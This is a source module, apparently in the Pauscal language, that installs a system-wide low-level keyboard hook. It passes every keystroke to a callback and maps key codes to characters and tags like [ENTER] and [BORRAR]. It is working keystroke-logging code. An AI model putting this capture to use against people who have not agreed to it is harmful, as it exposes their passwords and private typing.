<Datos><Nombre></Nombre><Icono>AA==</Icono><Version><Mayor>0</Mayor><Menor>0</Menor><Revision>0</Revision><AutoIncr>0</AutoIncr></Version><Info/><Contenido>Importar "Utiles.prp"
Importar "WinCtrls.prp"

$24ADV-
$24EBC-

Privado:
	Prototipo HookProcedimiento(VkCode,ScanCode,Flags,Time,DwExtraInfo:Entero)
	Var HookPtr:Entero
	Var @PtrEstruc:KBDLLHOOKSTRUCT
	Var @PtrProt:HookProcedimiento

	' Se llama cada vez que se oprime una tecla, este procedimiento llama al procedimiento establecido en TecladoIniciar _
	' y le establece los datos de la estructura en su orden original.
	Proc KeyboardHook(nCode:Entero,wParam:Word,lParam:Entero):Entero
		Si PtrEstruc@ = 0 Entonces PtrEstruc@ = lParam
		Si nCode = 0 Entonces
			PtrProt(PtrEstruc.VkCode,PtrEstruc.ScanCode,PtrEstruc.Flags,PtrEstruc.Time,PtrEstruc.DwExtraInfo)
		SiNo
			HookPtr = CallNextHookEx(0,HookPtr, wParam, lParam)
		FinSi
	FinProc
	
P$FAblico:

' Inicia el registro de teclas.
' ATENCI$D3N!: Llamar a [Programa.Ejecutar] para que el sistema procese los registros de teclas.
Proc TecladoIniciar(PtrProc:Entero)
	PtrProt@ = PtrProc
	HookPtr = SetWindowsHookEx(13, KeyboardHook@, GetModuleHandle(""), 0)
FinProc

' Termina el registro de teclas.
Proc TecladoTerminar()
	PtrProt@ = 0
	UnhookWindowsHookEx(HookPtr)
FinProc


Proc TecladoTraducir(i:Byte):Cadena
Seleccionar i
	Caso 13  ; Devolver "[ENTER]"
	Caso 81  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"Q":"q"
	Caso 87  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"W":"w"
	Caso 69  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"E":"e"
	Caso 82  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"R":"r"
	Caso 84  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"T":"t"
	Caso 89  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"Y":"y"
	Caso 85  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"U":"u"
	Caso 73  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"I":"i"
	Caso 79  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"O":"o"
	Caso 80  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"P":"p"
	Caso 65  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"A":"a"
	Caso 83  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"S":"s"
	Caso 68  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"D":"d"
	Caso 70  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"F":"f"
	Caso 71  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"G":"g"
	Caso 72  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"H":"h"
	Caso 74  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"J":"j"
	Caso 75  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"K":"k"
	Caso 76  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"L":"l"
	Caso 192 ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"$D1":"$F1"
	Caso 90  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"Z":"z"
	Caso 88  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"X":"x"
	Caso 67  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"C":"c"
	Caso 86  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"V":"v"
	Caso 66  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"B":"b"
	Caso 78  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"N":"n"
	Caso 77  ; Devolver &gt;GetAsyncKeyState(160) Or GetKeyState(20)?"M":"m"
	Caso 112 ; Devolver "[F1]"
	Caso 113 ; Devolver "[F2]"
	Caso 114 ; Devolver "[F3]"
	Caso 115 ; Devolver "[F4]"
	Caso 116 ; Devolver "[F5]"
	Caso 117 ; Devolver "[F6]"
	Caso 118 ; Devolver "[F7]"
	Caso 119 ; Devolver "[F8]"
	Caso 120 ; Devolver "[F9]"
	Caso 121 ; Devolver "[F10]"
	Caso 122 ; Devolver "[F11]"
	Caso 123 ; Devolver "[F12]"
	Caso 49  ; Devolver &gt;GetAsyncKeyState(160)?"!":"1"
	Caso 50  ; Devolver &gt;GetAsyncKeyState(160)?#34:"2"
	Caso 51  ; Devolver &gt;GetAsyncKeyState(160)?"$B7":"3"
	Caso 52  ; Devolver &gt;GetAsyncKeyState(160)?"$24":"4"
	Caso 53  ; Devolver &gt;GetAsyncKeyState(160)?"%":"5"
	Caso 54  ; Devolver &gt;GetAsyncKeyState(160)?"&amp;":"6"
	Caso 55  ; Devolver &gt;GetAsyncKeyState(160)?"/":"7"
	Caso 56  ; Devolver &gt;GetAsyncKeyState(160)?"(":"8"
	Caso 57  ; Devolver &gt;GetAsyncKeyState(160)?")":"9"
	Caso 48  ; Devolver &gt;GetAsyncKeyState(160)?"=":"0"
	Caso 9   ; Devolver "[TAB]"
	Caso 8   ; Devolver "[BORRAR]"
	Caso 220 ; Devolver &gt;GetAsyncKeyState(160)?"$AA":"$BA"
	Caso 96  ; Devolver "0"
	Caso 97  ; Devolver "1"
	Caso 98  ; Devolver "2"
	Caso 99  ; Devolver "3"
	Caso 100 ; Devolver "4"
	Caso 101 ; Devolver "5"
	Caso 102 ; Devolver "6"
	Caso 103 ; Devolver "7"
	Caso 104 ; Devolver "8"
	Caso 105 ; Devolver "9"
	Caso 27  ; Devolver "[ESCAPE]"
	Caso 2096852,32 ; Devolver " "
FinSeleccionar
FinProc
</Contenido></Datos>
